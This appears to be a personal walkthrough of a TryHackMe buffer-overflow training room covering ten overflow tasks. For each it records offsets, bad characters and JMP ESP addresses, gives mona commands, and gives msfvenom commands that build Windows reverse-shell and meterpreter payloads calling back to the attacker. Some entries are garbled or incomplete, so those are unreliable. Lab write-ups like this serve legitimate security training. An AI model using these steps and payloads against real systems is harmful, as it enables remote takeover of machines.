Buffer Overflow Prep
Date: 29, May, 2021
Author: Dhilip Sanjay S
Click Here to go to the TryHackMe room.
Connect to the machine using RDP:
Here spiking is not necessary, because we know that all the commands are vulnerable.
Scripts
Fuzzing
Finding Offset & overwriting EIP
Generate pattern using pattern_create:
Find offset using pattern_offset:
Finding Bad chars
Finding Right Module
Shell code & Shell Access
OVERFLOW 1
Fuzzing
Crash occurred at 2000 bytes
Finding Offset & overwriting EIP
Generate Pattern of length 2500
EIP VALUE = 6F43396E
Exact match at offset 1978
Finding Bad chars
Find the bad chars using mona:
\x00\x07\x2e\xa0
Finding Right Module
Find the right module using:
!mona modules
Find the jmp esp within that module excluding the bad chars:
!mona jmp -r esp -m essfunc.dll -cpb "\x00\x07\x2e\xa0"
JMP ESP address:
0x625011F7
Shell code & Shell Access
Generate shell code using:
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00\x07\x2e\xa0"
Don't forget to add nop sled.
Run the exploit & nc:
OVERFLOW 2
Fuzzing
Finding Offset & overwriting EIP
Generate Pattern of length 1200
EIP VALUE = 76413176
Exact match at offset 634
Finding Bad chars
Find the bad chars manually:
\x00\x23\x3c\x83\xba
Finding Right Module
Find the right module using:
!mona modules
Find the jmp esp within that module excluding the bad chars:
!mona jmp -r esp -m essfunc.dll -cpb "\x00\x23\x3c\x83\xba"
JMP ESP address:
0x625011BB
Shell code & Shell Access
Generate shell code using:
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00\x23\x3c\x83\xba"
Don't forget to add nop sled.
Run the exploit & nc:
OVERFLOW 3
Fuzzing
Finding Offset & overwriting EIP
Generate Pattern of length 1800
EIP VALUE = 35714234
Exact match at offset 1274
Found using:
mona findmsp -distance <pattern length>
Finding Bad chars
Find the bad chars using mona:
\x00\x11\x40\x5f\xb8\xee
Finding Right Module
Find the right module using:
!mona modules
Find the jmp esp within that module excluding the bad chars:
!mona jmp -r esp -m essfunc.dll -cpp "\x00\x11\x40\x5f\xb8\xee"
JMP ESP address:
62501203
(Only two addresses were available!)
Shell code & Shell Access
Generate shell code using:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=1234 -b "\x00\x11\x40\x5f\xb8\xee" -f py
Note: Meterpreter shell is larger in size
Don't forget to add nop sled.
Run the exploit &
multi/handler
in msfconsole:
OVERFLOW 4
Fuzzing
Finding Offset & overwriting EIP
Generate Pattern of length 2600
EIP VALUE = 005c394a
Exact match at offset 2026
Finding Bad chars
Find the bad chars using mona:
\x00\xa9\xcd\xd4
Finding Right Module
Find the right module using:
!mona modules
Find the jmp esp within that module excluding the bad chars:
!mona jmp -r esp -m essfunc.dll -cpb "\x00\xa9\xcd\xd4"
JMP ESP address:
625011eb
Shell code & Shell Access
Generate shell code using:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=1234 -b "\x00\xa9\xcd\xd4" -f p
Don't forget to add nop sled.
Run the exploit &
msfconsole multi/handler
:
OVERFLOW 5
Fuzzing
Finding Offset & overwriting EIP
Generate Pattern of 1000
EIP VALUE = 356b4134
Exact match at offset 314
Finding Bad chars
Find the bad chars manually:
\x00\x16\x2f\xf4\xfd
Finding Right Module
Find the right module using:
!mona modules
Find the jmp esp within that module excluding the bad chars:
!mona jmp -r esp -m essfunc.dll -cpb "\x00\x16\x2f\xf4\xfd"
JMP ESP address:
625011d3
Shell code & Shell Access
Generate shell code using:
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00\x16\x2f\xf4\xfd"
Don't forget to add nop sled.
Run the exploit & nc:
OVERFLOW 6
Fuzzing
Finding Offset & overwriting EIP
Generate Pattern of 1600
EIP VALUE = 35694234
Exact match at offset 1034
Finding Bad chars
Find the bad chars using mona:
\x00\x08\x2c\xad
Finding Right Module
Find the right module using:
!mona modules
Find the jmp esp within that module excluding the bad chars:
!mona jmp -r esp -m essfunc.dll -cpb "\x00\x08\x2c\xad"
JMP ESP address:
625011f7
Shell code & Shell Access
Generate shell code using:
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00\x08\x2c\xad"
Don't forget to add nop sled.
Run the exploit & nc:
OVERFLOW 7
Fuzzing
Finding Offset & overwriting EIP
Generate Pattern of 2000
EIP VALUE = 72423572
Exact match at offset 1306
Finding Bad chars
Find the bad chars manually:
\x00\x8c\xae\xbe\xfc
Finding Right Module
Find the right module using:
!mona modules
Find the jmp esp within that module excluding the bad chars:
!mona jmp -r esp -m essfunc.dll -cpb "\x00\x8c\xae\xbe\xfc"
JMP ESP address:
62501203
Shell code & Shell Access
Generate shell code using:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=1234 -f py -b "\x00\x8c\xae\xbe\xfc"
Don't forget to add nop sled.
Run the exploit & multi/handler:
OVERFLOW 8
Fuzzing
Finding Offset & overwriting EIP
Generate Pattern of 2300
EIP VALUE = 68433568
Exact match at offset 1786
Finding Bad chars
Find the bad chars using mona:
\x00\x1d\x2e\xc7\xee
Finding Right Module
Find the right module using:
!mona modules
Find the jmp esp within that module excluding the bad chars:
!mona jmp -r esp -m essfunc.dll -cpb "\x00\x1d\x2e\xc7\xee"
JMP ESP address:
62501205
Shell code & Shell Access
Generate shell code using:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=1234 -f py -b "\x00\x1d\x2e\xc7\xee"
Don't forget to add nop sled.
Run the exploit & multi/handler:
OVERFLOW 9
Fuzzing
Finding Offset & overwriting EIP
Generate Pattern of length 2000
EIP VALUE = 35794234
Exact match at offset
Finding Bad chars
Find the bad chars using mona:
\x00\x04\x3e\x3f\xe1
Note: \x3f is not bad char (but the answer in tryhackme required 5 chars)
On rerunning the script, I found that
x3f
is bad. So, it also affected\x40
. (This can be done by setting\x3e
to some non-bad characters).So, if two bad characters are adjacent, it cannot be determined in a single test. We have to run the exploit multiple times to detect that!
Finding Right Module
Find the right module using:
!mona modules
Find the jmp esp within that module excluding the bad chars:
!mona jmp -r esp -m essfunc.dll -cpb "\x00\x04\x3e\x3f\xe1"
JMP ESP address:
625011c7
Shell code & Shell Access
Generate shell code using:
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00\x04\x3e\x3f\xe1"
Don't forget to add nop sled.
Run the exploit & nc:
OVERFLOW 10
Fuzzing
Finding Offset & overwriting EIP
Generate Pattern of 1000
EIP VALUE = 41397241
Exact match at offset 537
Finding Bad chars
Find the bad chars using mona:
\x00\xa0\xad\xbe\xde\xef
Finding Right Module
Find the right module using:
!mona modules
Find the jmp esp within that module excluding the bad chars:
!mona jmp -r esp -m essfunc.dll -cpb "!mona jmp -r esp -m essfunc.dll -cpb \x00\xa0\xad\xbe\xde\xef"
JMP ESP address:
625011af
Shell code & Shell Access
Generate shell code using:
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1234 EXITFUNC=thread -f py -b "\x00\xa0\xad\xbe\xde\xef"
Don't forget to add nop sled.
Run the exploit & nc:
Last updated